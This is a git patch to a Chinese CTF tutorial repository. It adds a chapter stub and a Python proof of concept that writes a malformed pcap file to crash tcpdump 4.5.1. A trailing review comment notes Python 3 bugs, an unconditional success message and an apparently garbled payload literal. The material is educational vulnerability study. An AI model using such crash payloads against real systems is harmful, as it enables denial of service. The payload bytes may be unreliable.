From 1c42f754e2a269c06e70b558a68aa5613971a9af Mon Sep 17 00:00:00 2001
From: firmianay
Date: Tue, 12 Dec 2017 00:35:10 +0800
Subject: [PATCH] add 7.1.1
---
 CONTRIBUTION.md | 1 +
 README.md | 2 ++
 SUMMARY.md | 2 ++
 doc/5.3_angr.md | 2 +-
 doc/7.1.1_dos_tcpdump_crash.md | 15 ++++++++
 doc/7_exploit.md | 3 ++
 src/exploit/7.1.1_dos_tcpdump_crash/exp.py | 41 ++++++++++++++++++++++
 src/exploit/init | 0
 8 files changed, 65 insertions(+), 1 deletion(-)
 create mode 100644 doc/7.1.1_dos_tcpdump_crash.md
 create mode 100644 src/exploit/7.1.1_dos_tcpdump_crash/exp.py
 delete mode 100644 src/exploit/init
diff --git a/CONTRIBUTION.md b/CONTRIBUTION.md
index 178519e..d004af1 100644
--- a/CONTRIBUTION.md
+++ b/CONTRIBUTION.md
@@ -52,6 +52,7 @@
 - 如果你新添加一个章节,需要在 **README.md**、**SUMMARY.md** 和章节所属部分相应的文件中添加条目。
 - 新增第六章题解篇,收集各种好题的Writeup,应力求详细,且能提供程序供实际操作,一个md只写一题,所有文件上传到文件夹`src/writeup`,题目最好来自 [CTFs](https://github.com/ctfs)。
 - 新增第七章实战篇,CTF之后,总是要回到现实中,对真实存在的漏洞进行分析利用,还是一样力求详细,并提供程序复现,一个md写一个漏洞,所有文件上传到`src/exploit`(程序太大的可附上网盘链接),参考 [exploit-db](https://www.exploit-db.com/)。
+ - 考虑到真实漏洞的环境可能会很复杂,如果能做一个基于 docker 的环境,应该会很不错,这条就作为一个未来的计划。
 | 章节 | 作者 | 进度 |
diff --git a/README.md b/README.md
index ad687fe..6bfde07 100644
--- a/README.md
+++ b/README.md
@@ -89,6 +89,8 @@
 - [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
 - [七、实战篇](doc/7_exploit.md)
+ - Denial of Service and PoC Exploits
+ - [7.1.1 tcpdump 4.5.1 Access Violation Crash](doc/7.1.1_dos_tcpdump_crash.md)
 - [八、附录](doc/8_appendix.md)
 - [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
diff --git a/SUMMARY.md b/SUMMARY.md
index 09a51d1..a466893 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -87,6 +87,8 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
 * [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md)
 * [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
 * [七、实战篇](doc/7_exploit.md)
+ * Denial of Service and PoC Exploits
+ * [7.1.1 tcpdump 4.5.1 Access Violation Crash](doc/7.1.1_dos_tcpdump_crash.md)
 * [八、附录](doc/8_appendix.md)
 * [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
 * [8.2 更多 Windows 工具](doc/8.2_wintools.md)
diff --git a/doc/5.3_angr.md b/doc/5.3_angr.md
index 1e63306..26d1f69 100644
--- a/doc/5.3_angr.md
+++ b/doc/5.3_angr.md
@@ -43,7 +43,7 @@ $ sudo python setup.py install
 ## 使用 angr
-#### 基础功能
+#### 入门
 使用 angr 的第一步是新建一个工程,几乎所有的操作都是围绕这个工程展开的:
 ```python
 >>> import angr
diff --git a/doc/7.1.1_dos_tcpdump_crash.md b/doc/7.1.1_dos_tcpdump_crash.md
new file mode 100644
index 0000000..a01eed8
--- /dev/null
+++ b/doc/7.1.1_dos_tcpdump_crash.md
@@ -0,0 +1,15 @@
+# 7.1.1 tcpdump 4.5.1 Access Violation Crash
+
+- [漏洞复现](#漏洞复现)
+- [漏洞分析](#漏洞分析)
+- [参考资料](#参考资料)
+
+
+[下载文件](../src/exploit/7.1.1_dos_tcpdump_crash)
+
+## 漏洞复现
+
+## 漏洞分析
+
+## 参考资料
+- [TCPDump 4.5.1 - Crash (PoC)](https://www.exploit-db.com/exploits/39875/)
diff --git a/doc/7_exploit.md b/doc/7_exploit.md
index 2969435..e283e03 100644
--- a/doc/7_exploit.md
+++ b/doc/7_exploit.md
@@ -1 +1,4 @@
 # 第七篇 实战篇
+
+- Denial of Service and PoC Exploits
+ - [7.1.1 tcpdump 4.5.1 Access Violation Crash](7.1.1_dos_tcpdump_crash.md)
diff --git a/src/exploit/7.1.1_dos_tcpdump_crash/exp.py b/src/exploit/7.1.1_dos_tcpdump_crash/exp.py
new file mode 100644
index 0000000..8de6cf4
--- /dev/null
+++ b/src/exploit/7.1.1_dos_tcpdump_crash/exp.py
@@ -0,0 +1,41 @@
+# Exploit Title: tcpdump 4.5.1 Access Violation Crash
+# Date: 31st May 2016
+# Exploit Author: David Silveiro
+# Vendor Homepage: http://www.tcpdump.org
+# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
+# Version: 4.5.1
+# Tested on: Ubuntu 14 LTS
+
+from subprocess import call
+from shlex import split
+from time import sleep
+
+def crash():
+    command = 'tcpdump -r crash'
+
+    buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
+    buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
+    buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
+    buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
+    buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
+    buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
+    buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'
+
+    with open('crash', 'w+b') as file:
+        file.write(buffer)
+
+    try:
+        call(split(command))
+        print("Exploit successful! ")
+    except:
+        print("Error: Something has gone wrong!")
+
+def main():
+    print("Author: David Silveiro ")
+    print(" tcpdump version 4.5.1 Access Violation Crash ")
+
+    sleep(2)
+    crash()
+
+if __name__ == "__main__":
+    main()
diff --git a/src/exploit/init b/src/exploit/init
deleted file mode 100644
index e69de29..0000000
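Review bot: `crash()` opens `crash` with `'w+b'` but writes a `str`, so on Python 3 `file.write(buffer)` raises `TypeError` before tcpdump is ever run; the script appears to target Python 2, where `str` is already bytes, and the seven literals should be bytes literals (`buffer = b'\xd4\xc3\xb2\xa1...'`) so each `\x..` escape lands in the file as one octet on either interpreter. The success message is unconditional: `call()` returns tcpdump's exit status, so `"Exploit successful! "` prints even when tcpdump exits normally, and the bare `except:` also hides a missing `tcpdump` binary — capture it as `ret = call(split(command))`, report `ret < 0` (child terminated by a signal) separately from a clean exit, and catch `OSError` rather than everything. The sixth literal, `"xfe$\x00...\n', '\x00..."`, has no backslash before `xfe` and an embedded `', '` fragment, which reads like a transcription artifact of the exploit-db listing the header cites; worth verifying against it before the write-up relies on this file. `buffer` and `file` shadow builtins (`data` and `fh` would avoid that), and the `sleep(2)` in `main()` serves no purpose.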